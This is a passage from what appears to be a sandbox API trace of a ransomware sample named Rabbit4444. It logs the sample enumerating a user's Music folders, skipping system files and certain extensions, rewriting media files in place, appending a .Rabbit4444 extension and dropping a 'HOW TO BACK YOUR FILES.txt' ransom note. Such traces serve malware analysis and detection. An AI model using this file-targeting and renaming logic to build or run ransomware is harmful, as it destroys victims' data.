(lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\G_JtWgQVBTJ7M2pd_.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\g_jtwgqvbtj7m2pd_.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.156] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.156] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14046633356) returned 1 [0049.156] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18436) returned 1 [0049.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0049.156] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b10, lpName=0x0) returned 0x298 [0049.156] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b10) returned 0x70000 [0049.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.157] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.157] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.157] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.157] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.157] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14046775195) returned 1 [0049.157] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.157] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0049.157] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.157] CloseHandle (hObject=0x298) returned 1 [0049.157] CloseHandle (hObject=0x278) returned 1 [0049.159] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\G_JtWgQVBTJ7M2pd_.m4a.Rabbit4444") returned 75 [0049.159] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\G_JtWgQVBTJ7M2pd_.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\g_jtwgqvbtj7m2pd_.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\G_JtWgQVBTJ7M2pd_.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\g_jtwgqvbtj7m2pd_.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.159] InterlockedExchangeAdd (in: Addend=0xff618, Value=18448 | out: Addend=0xff618) returned 20060816 [0049.159] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3488 [0049.159] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45b95700, ftCreationTime.dwHighDateTime=0x1d4d391, ftLastAccessTime.dwLowDateTime=0xd2151f50, ftLastAccessTime.dwHighDateTime=0x1d4c7d8, ftLastWriteTime.dwLowDateTime=0xd2151f50, ftLastWriteTime.dwHighDateTime=0x1d4c7d8, nFileSizeHigh=0x0, nFileSizeLow=0x132c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TI1y-X-BXK09.wav", cAlternateFileName="TI1Y-X~1.WAV")) returned 1 [0049.159] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.159] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.159] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="Rabbit4444.exe") returned 1 [0049.159] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2=".") returned 1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="..") returned 1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="windows") returned -1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="bootmgr") returned 1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="pagefile.sys") returned 1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="boot") returned 1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="ids.txt") returned 1 [0049.160] lstrcmpiW (lpString1="TI1y-X-BXK09.wav", lpString2="NTUSER.DAT") returned 1 [0049.160] lstrcpyW (in: lpString1=0x130eb8e, lpString2="TI1y-X-BXK09.wav" | out: lpString1="TI1y-X-BXK09.wav") returned="TI1y-X-BXK09.wav" [0049.160] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\TI1y-X-BXK09.wav", dwFileAttributes=0x0) returned 1 [0049.160] lstrlenW (lpString="TI1y-X-BXK09.wav") returned 16 [0049.160] lstrlenW (lpString="Rabbit4444") returned 10 [0049.160] lstrcmpiW (lpString1="-BXK09.wav", lpString2="Rabbit4444") returned -1 [0049.160] lstrlenW (lpString=".dll") returned 4 [0049.160] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.160] lstrlenW (lpString=".lnk") returned 4 [0049.160] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.160] lstrlenW (lpString=".ini") returned 4 [0049.160] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.160] lstrlenW (lpString=".sys") returned 4 [0049.160] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.160] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\TI1y-X-BXK09.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\ti1y-x-bxk09.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.160] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.160] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14047113645) returned 1 [0049.160] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=78535) returned 1 [0049.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0049.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0049.161] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x135d0, lpName=0x0) returned 0x298 [0049.161] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x135d0) returned 0x70000 [0049.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.163] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14047381552) returned 1 [0049.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0049.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0049.163] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.164] CloseHandle (hObject=0x298) returned 1 [0049.164] CloseHandle (hObject=0x278) returned 1 [0049.166] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\TI1y-X-BXK09.wav.Rabbit4444") returned 70 [0049.166] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\TI1y-X-BXK09.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\ti1y-x-bxk09.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\TI1y-X-BXK09.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\ti1y-x-bxk09.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.167] InterlockedExchangeAdd (in: Addend=0xff618, Value=78544 | out: Addend=0xff618) returned 20079264 [0049.167] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3489 [0049.167] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb6b6db0, ftCreationTime.dwHighDateTime=0x1d4d516, ftLastAccessTime.dwLowDateTime=0x74d99800, ftLastAccessTime.dwHighDateTime=0x1d4cf69, ftLastWriteTime.dwLowDateTime=0x74d99800, ftLastWriteTime.dwHighDateTime=0x1d4cf69, nFileSizeHigh=0x0, nFileSizeLow=0x168ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tMHF 2k.mp3", cAlternateFileName="TMHF2K~1.MP3")) returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="Rabbit4444.exe") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2=".") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="..") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="windows") returned -1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="bootmgr") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="pagefile.sys") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="boot") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="ids.txt") returned 1 [0049.167] lstrcmpiW (lpString1="tMHF 2k.mp3", lpString2="NTUSER.DAT") returned 1 [0049.167] lstrcpyW (in: lpString1=0x130eb8e, lpString2="tMHF 2k.mp3" | out: lpString1="tMHF 2k.mp3") returned="tMHF 2k.mp3" [0049.167] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\tMHF 2k.mp3", dwFileAttributes=0x0) returned 1 [0049.168] lstrlenW (lpString="tMHF 2k.mp3") returned 11 [0049.168] lstrlenW (lpString="Rabbit4444") returned 10 [0049.168] lstrcmpiW (lpString1="MHF 2k.mp3", lpString2="Rabbit4444") returned -1 [0049.168] lstrlenW (lpString=".dll") returned 4 [0049.168] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.168] lstrlenW (lpString=".lnk") returned 4 [0049.168] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.168] lstrlenW (lpString=".ini") returned 4 [0049.168] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.168] lstrlenW (lpString=".sys") returned 4 [0049.168] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.168] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\tMHF 2k.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\tmhf 2k.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.168] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.168] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14047873444) returned 1 [0049.168] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=92362) returned 1 [0049.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0049.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.168] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16bd0, lpName=0x0) returned 0x298 [0049.168] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16bd0) returned 0x70000 [0049.171] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.171] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.171] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.171] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.171] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14048172798) returned 1 [0049.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0049.171] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.171] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.172] CloseHandle (hObject=0x298) returned 1 [0049.172] CloseHandle (hObject=0x278) returned 1 [0049.175] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\tMHF 2k.mp3.Rabbit4444") returned 65 [0049.175] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\tMHF 2k.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\tmhf 2k.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\tMHF 2k.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\tmhf 2k.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0049.175] InterlockedExchangeAdd (in: Addend=0xff618, Value=92368 | out: Addend=0xff618) returned 20157808 [0049.175] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3491 [0049.175] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb6b6db0, ftCreationTime.dwHighDateTime=0x1d4d516, ftLastAccessTime.dwLowDateTime=0x74d99800, ftLastAccessTime.dwHighDateTime=0x1d4cf69, ftLastWriteTime.dwLowDateTime=0x74d99800, ftLastWriteTime.dwHighDateTime=0x1d4cf69, nFileSizeHigh=0x0, nFileSizeLow=0x168ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tMHF 2k.mp3", cAlternateFileName="TMHF2K~1.MP3")) returned 0 [0049.176] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0049.176] lstrcpyW (in: lpString1=0x130eb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.176] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\0S8C98Izi8QyG\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\0s8c98izi8qyg\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.177] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.177] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.178] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.178] CloseHandle (hObject=0x278) returned 1 [0049.178] CloseHandle (hObject=0x27c) returned 1 [0049.179] GetCurrentThreadId () returned 0xd98 [0049.179] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0049.179] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp") returned="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp" [0049.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115748 | out: hHeap=0xe0000) returned 1 [0049.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0049.179] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp" | out: lpString1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp") returned="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp" [0049.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\") returned="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\" [0049.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\.BFC0E91B00AE8A0620D3" [0049.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.180] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.183] FlushFileBuffers (hFile=0x27c) returned 1 [0049.188] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.188] CloseHandle (hObject=0x27c) returned 1 [0049.189] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp") returned 42 [0049.189] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.189] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae1c8c50, ftCreationTime.dwHighDateTime=0x1d4d1fb, ftLastAccessTime.dwLowDateTime=0x49ee4e50, ftLastAccessTime.dwHighDateTime=0x1d4d3b6, ftLastWriteTime.dwLowDateTime=0xe6a2a8fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0049.189] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.189] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.189] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.189] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.189] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae1c8c50, ftCreationTime.dwHighDateTime=0x1d4d1fb, ftLastAccessTime.dwLowDateTime=0x49ee4e50, ftLastAccessTime.dwHighDateTime=0x1d4d3b6, ftLastWriteTime.dwLowDateTime=0xe6a2a8fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.189] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.189] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.189] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.189] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.189] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.189] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6a2a8fc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6a2a8fc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6a2a8fc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.189] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.189] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.190] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2af44f0, ftCreationTime.dwHighDateTime=0x1d4d202, ftLastAccessTime.dwLowDateTime=0xdcb8870, ftLastAccessTime.dwHighDateTime=0x1d4ca1a, ftLastWriteTime.dwLowDateTime=0xdcb8870, ftLastWriteTime.dwHighDateTime=0x1d4ca1a, nFileSizeHigh=0x0, nFileSizeLow=0x1730f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4f5YCJ0pI.wav", cAlternateFileName="4F5YCJ~1.WAV")) returned 1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="Rabbit4444.exe") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2=".") returned 1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="..") returned 1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="windows") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="bootmgr") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="pagefile.sys") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="boot") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="ids.txt") returned -1 [0049.190] lstrcmpiW (lpString1="4f5YCJ0pI.wav", lpString2="NTUSER.DAT") returned -1 [0049.190] lstrcpyW (in: lpString1=0x130eb8e, lpString2="4f5YCJ0pI.wav" | out: lpString1="4f5YCJ0pI.wav") returned="4f5YCJ0pI.wav" [0049.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\4f5YCJ0pI.wav", dwFileAttributes=0x0) returned 1 [0049.190] lstrlenW (lpString="4f5YCJ0pI.wav") returned 13 [0049.190] lstrlenW (lpString="Rabbit4444") returned 10 [0049.190] lstrcmpiW (lpString1="YCJ0pI.wav", lpString2="Rabbit4444") returned 1 [0049.190] lstrlenW (lpString=".dll") returned 4 [0049.190] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.190] lstrlenW (lpString=".lnk") returned 4 [0049.190] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.190] lstrlenW (lpString=".ini") returned 4 [0049.190] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.190] lstrlenW (lpString=".sys") returned 4 [0049.190] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.190] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\4f5YCJ0pI.wav" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\4f5ycj0pi.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.191] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.191] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14050132481) returned 